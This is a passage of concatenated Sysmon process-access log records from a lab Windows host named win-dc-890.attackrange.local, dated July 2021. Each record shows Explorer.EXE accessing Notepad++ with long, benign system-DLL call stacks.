Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
